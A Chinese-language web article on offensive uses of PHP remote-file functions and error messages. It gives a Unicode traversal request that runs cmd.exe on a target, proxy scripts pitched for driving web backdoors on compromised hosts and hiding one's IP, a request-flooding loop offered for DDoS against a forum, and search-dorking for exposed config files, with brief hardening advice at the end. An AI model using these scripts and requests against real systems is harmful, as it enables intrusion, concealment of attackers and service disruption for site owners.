安科网

PHP在安全方面的另类应用

UESTC

UESTC

2011-03-10

关注 关注

1.远程文件

PHP是一门具有丰富特性的语言,它提供了大量函数,使程序员能够方便地实现各种功能,远程文件就是一个很好的例子:

代码

$fp=@Fopen($url,"r") or die ("cannot open $url");

while($line=@fgets($fp,1024)) {

$contents.=$line;

}

echo $contents; //显示文件内容

fclose($fp); //关闭文件

?>

以上是一段利用Fopen函数打开文件的代码,由于Fopen函数支持远程文件,使得它应用起来相当有趣,将以上代码保存为Proxy.php,然后后提交:

代码

/proxy.php?url=http://www.hacker.com.cn/bbs

这时候你会发现论坛下方显示的IP地址变成了PHP脚本所处服务器的IP地址。Fopen函数可以从任何其Web或FTP站点读取文件,事实上PHP的大多数文件处理函数对远程文件都是透明的,比如请求:

代码

/proxy.php?url=http://target/script/..%c1%1c../winnt/system32/cmd.exe?/c+dir

这样实际上是利用了Target主机上的Unicode漏洞,执行了DIR命令。但并不是所有的服务器都支持远程文件的功能,如果你使用的是商业的服务器,很可能会发现远程文件使用不了(如51的虚拟主机),这是因为在商业主机上限制远程文件的功能,往往能够更好的保护服务器的正常运行。你可以通过PHPinfo()查看服务器是否支持这种功能。当然,在PHPinfo()被禁用的情况下,也可以使用Get_cfg_var():

代码

echo "是否允许使用远程文件(allow_url_Fopen)";

?php

if (get_cfg_var("allow_url_Fopen")=="1")

{

echo("");

}

else echo("");

?>

当Allow_url_Fopen一项参数为ON时,即支持远程文件的功能。充分发挥远程文件的特性,我们可以实现许多特殊的功能:如果你是用过PHP Flame的最新版本,你会发现它在集文件夹复制、文本搜索等功能的基础上,又增加了Web间文件传输的功能,依靠这种功能,你可以随意将其他服务器上的文件传送到你的Web目录下。而且,在两台服务器间传送文件有着飞快的传输速度。我们看看实现这个功能的代码:

代码

$fp = Fopen($_GET['filename'], 'rb'); //打开文件

$data = $tmp = '';

while ( true ) {

$tmp = fgets($fp, 1024);

if ( 0 === strlen($tmp) ) {

break; //跳出while循环

}

$data .= $tmp;

}

fclose($fp); //关闭文件

$file=preg_replace("/^.+//","",$filename);//转换文件名

//write

$fp = Fopen("$file", 'wb'); //生成文件

fwrite($fp, $data); //写入数据

fclose($fp);

?>

在调用Fopen和Fwrite函数时加入"b"标记,可以使这两个函数安全运用于二进制文件而不损坏数据。在以上脚本提交:

/down.php?filename=http://www.chinaz.com/winrar.zip

这时便会在Down.php的所处目录下生成相应的Winrar.zip文件。如果再配合遍历目录的功能,你将可以实现多个文件夹服务器间的传输。但是,远程文件应该还有更大的发挥空间,比如写SQL Injection攻击的自动脚本,甚至是HTTP的代理服务:

代码

$url = getenv("QUERY_STRING");

if(!ereg("^http",$url)) //检查输入的URL格式

{

echo "例子:
http://www.163.com/
";

echo "http://www.xxxx.com/list.php?id=600
";

echo "当URL为目录时需要在目录后加入"/"";

exit;

}

if($url)

$url=str_replace("\","/",$url);

$f=@Fopen($url,"r"); //打开文件

$a="";

if($f)

{

while(!feof($f))

$a.=@fread($f,8000); //读取文件

fclose($f);

}

$rooturl = preg_replace("/(.+/)(.*)/i","\1",$url); //转换根目录

$a = preg_replace("/(src[[:space:]]*=['"])([^h].*?)/is","\1$rooturl\2",$a);

$a = preg_replace("/(src[[:space:]]*=)([^h'"].*?)/is","\1$rooturl\2",$a); //转换图片地址

$a = preg_replace("/(action[[:space:]]*=['"])([^h].*?)/is","\1$php_self?$rooturl\2",$a);

$a = preg_replace("/(action[[:space:]]*=)([^h'"].*?)/is","\1$php_self?$rooturl\2",$a); //转换POST地址

$a = preg_replace("/(

$a = preg_replace("/(

$a = preg_replace("/(link.+?href[[:space:]]*=[^'"])(.*?)/is","\1$rooturl\2",$a);

$a = preg_replace("/(link.+?href[[:space:]]*=['"])(.*?)/is","\1$rooturl\2",$a); //转换样式表地址

echo $a;

exit;

?>

在正则表达式的帮助下,以上代码能够自行地将返回页面中包含的链接和图片进行转换,并把页面内的链接自动提交到当前PHP脚本的$url中。例如提交:

/proxy.php?http://www.xfocus.net/

脚本将会返回http://www.xfocus.net/的内容,如图1所示。

图1

当然,这运用的绝对不仅仅是框架的技巧。运用这个脚本你可以远程操作安置在其他服务器的Web后门,或者将肉鸡做成一个简单的HTTP代理,从而更好的隐藏自己的IP。如果使用PHP编写CGI扫描工具,你需要延长PHP的有效运行时间。以下是两种有效的方法,当然你也可以将PHP代码编译成GUI界面,从而解决这个问题。设置PHP的有效运行时间为三分钟:

代码

我们再看看这种功能在DDOS攻击中的应用:

代码

set_time_limit(60*3);

$url="http://www.xxx.com/bbs/userlist.php?userid=";

for($i=1131;$i<=1180;$i++)

{

$urls=$url.$i; //将$url与$i链接在一起

$f=@Fopen($urls,"r"); //请求$urls

$a=@fread($f,10); //取出部分内容

fclose($f); //关闭$urls

}

?>

以上用For循环不断地请求Userlist.php?userid=$i的内容($i的值每次都是不同的),但是打开后仅仅取出几个字节便关闭这个脚本了。PHP运行在虚拟主机上,10秒钟便可以打开几十个URL,当同时运行多个进程时,便有可能实现DDOS攻击,让对方的论坛迅速崩溃。

限于版面,远程文件的内容就先说到这里了,如果你还有不明白的地方,请参考以下的这篇文章:《在PHP中使用远程文件》

2.错误回显

PHP在默认的情况下打开错误回显,这样可以便于程序员在调试脚本时发现代码的错误,但是这也往往使Web暴露了PHP的代码和服务器的一些数据。PHP对代码的规范性要求比较严格,以下是一种比较常见的错误回显:

warning:file("data/1120'.htm)-no such file or

directory in /usr/home/xxxxx.com/show.php on line 300

这种错误回显,至少告诉了我们三个信息:服务器的操作系统是LINUX;服务器使用文本数据库;Show.php的第300行代码为"file ("./data/1120/".$data.".htm")"。

这种错误回显,已经足以成为一台服务器致命的漏洞。从另一个利用的角度来看,我们发现一般的PHP错误回都包含了"warning"字符,但是这有什么用呢?我们得先认识一下PHP的库文件。

PHP的Include()和Require()主要是为了支持代码库,因为我们一般是把一些经常使用的函数放到一个独立的文件中,这个独立的文件就是代码库,当需要使用其中的函数时,我们只要把这个代码库包含到当前的文件中就可以了。

最初,人们开发和发布PHP程序的时候,为了区别代码库和主程序代码,一般是为代码库文件设置一个".inc"的扩展名,但是他们很快发现这是一个错误,因为这样的文件无法被PHP解释器正确解析为PHP代码。如果我们直接请求服务器上的这种文件时,我们就会得到该文件的源代码,这是因为当把PHP作为Apache的模块使用时,PHP解释器是根据文件的扩展名来决定是否解析为PHP代码的。扩展名是站点管理员指定的,一般是".php", ".php3"和".php4"。如果重要的配置数据被包含在没有合适的扩展名的PHP文件中,那么远程攻击者将容易得到这些信息。

按照以往的程序员的习惯,往往会把一些重要的文件设定"config.inc","coon.inc"等形式,如果我们在搜索引闹兴阉"warning+config.inc",那么你会发现许多网站都暴露了".inc"文件的代码,甚至包括许多商业和政府网站,如图2所示。

图2

要关闭PHP的错误回显通常有两个方法,第一个是直接修改Php.ini中的设置,这我们以前已经介绍过了;第二种方法是在PHP脚本中加入抑制错误回显的代码,你可以在调用的函数前函数加入"@"字符,或者在PHP的代码顶端加入"error_reporting(0);"的代码,要了解更多的内容请参考PHP手册中的"error_reporting"一节。

 

 

(本文由责任编辑 pasu 整理发布)

 

 

php fopen

UESTC

UESTC

0 关注 0 粉丝 0 动态

关注 关注

相关推荐

PHP fopen中文文件名乱码问题解决方案

一般在php中会使用fopen进行生成文件,但是当文件名存在中文时保存文件会出现中文乱码。$fileName = __DIR__ . '\测试.txt';所以当要在页面上输出文件名又需要保存文件时,可以先保存原先的中文文件名,再通过文件名编码进行创建文件。

mathchao 2020-10-28

PHP实现倒计时功能

<p>考试结束时间:<?

wqcong 2020-11-16

关于PHP求解三数之和问题详析

给你一个包含 n 个整数的数组 nums,判断 nums 中是否存在三个元素 a,b,c ,使得 a + b + c = 0 ?请你找出所有满足条件且不重复的三元组。给定数组 nums = [-1, 0, 1, 2, -1, -4],暴力枚举法,三层 fo

zyyjay 2020-11-09

PHP中isset、empty的用法与区别示例详解

在编写程序调用变量时,遇到未定义的变量时,会报错,这是就需要我们对变量先进行判断,再进行相关操作。如果已经使用 unset() 释放了一个变量之后,它将不再是 isset()。若使用 isset() 测试一个被设置成 NULL 的变量,将返回 FALSE。

xuebingnan 2020-11-05

PHP后门隐藏的一些技巧总结

Get-ItemProperty -Path D:\1.dll | Format-list -Property * -Force. powershell.exe -command "ls 'upload\*.*' | foreach-object

samtrue 2020-11-22

PHP 99乘法表的几种实现代码

首先按照规矩,还是先废话一番,对于刚学PHP的新手来讲,用php写九九乘法表无疑是非常经典的一道练习题。但不要小看这道练习题,它对于逻辑的考验还是相当到位的。也许有人会觉得,九九乘法表有什么难的,我两分钟就可以写出来。可是对于新手,却是可以锻炼逻辑思维的。

stefan0 2020-11-22

php7连接MySQL实现简易查询程序的方法

假设我们制作的是分班情况查询程序,将使用PHP7的环境以PDO的方式连接MySQL。通过学号和姓名查询自己所在班级。准备就绪,开始吧,现在!echo "<tr><th>学号</th><th>姓名&l

yifangs 2020-10-13

如何利用PHP实现上传图片功能详解

对于中文网页需要使用<meta charset="utf-8">声明编码,否则会出现乱码。二 、form表单 <form>标签用于为用户输入创建 HTML 表单,表单里包含php文件路径,配置数据传输方式,{ec

songshijiazuaa 2020-09-24

PHP编程一定要改掉的5个不良习惯

测试循环前数组是否为空?foreach循环或数组函数可以处理空数组。这不是特定于PHP的,但我经常看到它。你可以通过提前返回,来减少缩进级别的极简代码!该函数的所有“有用”主体现在处于第一个缩进级别。而且该函数一次可以接受多个参数!最后一个错误我看到的往往

hebiwtc 2020-09-18

goto语法在PHP中的使用教程

在C++、Java及很多语言中,都存在着一个神奇的语法,就是goto。代码运行到 goto 位置时,就跳转到了 a: 所在的代码行并继续执行下去。它们都会报同样的错误,因为作用域的关系无法找到定义的 goto 标签。代码执行到 goto 时,跳回了之前的b

天步 2020-09-17

PHP http请求超时问题解决方案

1,curl进程运行了一个世纪还木结束,curl的时候设置了超时时间 --connect-timeout 1000. 2,operation timed out after 1000 milliseconds with 0 bytes received.

83911535 2020-11-13

PHP dirname简单使用代码实例

给出一个包含有指向一个文件的全路径的字符串,本函数返回去掉文件名后的目录名。在 Windows 中,斜线(/)和反斜线(\)都可以用作目录分隔符。在其它环境下是斜线(/)。否则返回的是把path中结尾的/component去掉之后的字符串。echo &qu

whatsyourname 2020-11-13

基于PHP实现用户在线状态检测

//$sql = ' delete from __TABLE__ where ';login_account')) { // 如果是登录用户

zhouyuqi 2020-11-10

PHP常量DIRECTORY_SEPARATOR原理及用法解析

在 Windows 中,斜线(/)和反斜线(\)都可以用作目录分隔符,在linux上路径的分隔符是"/"。在程序本地运行很正常,上传到服务器后,发现图片没有显示出来,图片链接是绝对路径 var/,而且当中带有 \ 但是我记得这个路径已经

Noneyes 2020-11-10

PhpStorm 2020.3:新增开箱即用的PHP 8属性(推荐)

wzm 2020-10-30

PHP dirname功能及原理实例解析

给出一个包含有指向一个文件的全路径的字符串,本函数返回去掉文件名后的目录名。在 Windows 中,斜线(/)和反斜线(\)都可以用作目录分隔符。在其它环境下是斜线(/)。否则返回的是把path中结尾的/component去掉之后的字符串。echo &qu

王志龙 2020-10-28

PHP dirname(__FILE__)原理及用法解析

即使这个文件被其他文件引用,__file__始终是它所在文件的完整路径,而不是引用它的那个文件完整路径。dirname;得到的是__FILE__所在文件的上一层目录名。_FILE_ 得到的就是完整路径 即 F:\Modoer_2.6_SC_UTF8\upl

wwwsurfphpseocom 2020-10-28

如何运行/调试你的PHP代码

没有任何一名程序员可以一气呵成、完美无缺的在不用调试的情况下完成一个功能或模块。调试实际分很多种情况。本篇文章我分享下自己在实际开发工作中的经验,我个人理解,调试分三种,注意我所讲的是调试并非测试。这种方式简单粗暴,一般PHP程序员都会用,那就是浏览器调试

diskingchuan 2020-10-23

php redis setnx分布式锁简单原理解析

我就废话不多说了,大家还是直接看代码吧~如果一个请求更新缓存的时间比较长,甚至比锁的有效期还要长,导致在缓存更新过程中,锁就失效了,此时另一个请求会获取锁,但前一个请求在缓存更新完毕的时候,如果不加以判断直接删除锁,就会出现误删除其它请求创建的锁的情况,所

savorTheFlavor 2020-10-23

php使用event扩展的io复用测试的示例

//sock_set_option; //复用还处于 TIME_WAIT

Nicolase 2020-10-20
UESTC

UESTC

W3CSchool教程
HTML 教程
CSS 教程
Bootstrap 教程
Javascript 教程
jQuery 教程
后端教程
C 教程
Java 教程
PHP 教程
Python 教程
Go 教程
移动开发
Android 教程
Swift 教程
Kotlin 教程
jQuery Mobile 教程
ionic 教程
关于我们
新闻动态
联系方式
招聘英才
安科实验室
帮助与反馈

安科网(Ancii),中国第一极客网

Copyright © 2013 - 2019 Ancii.com

京ICP备18063983号 京公网安备11010802014868号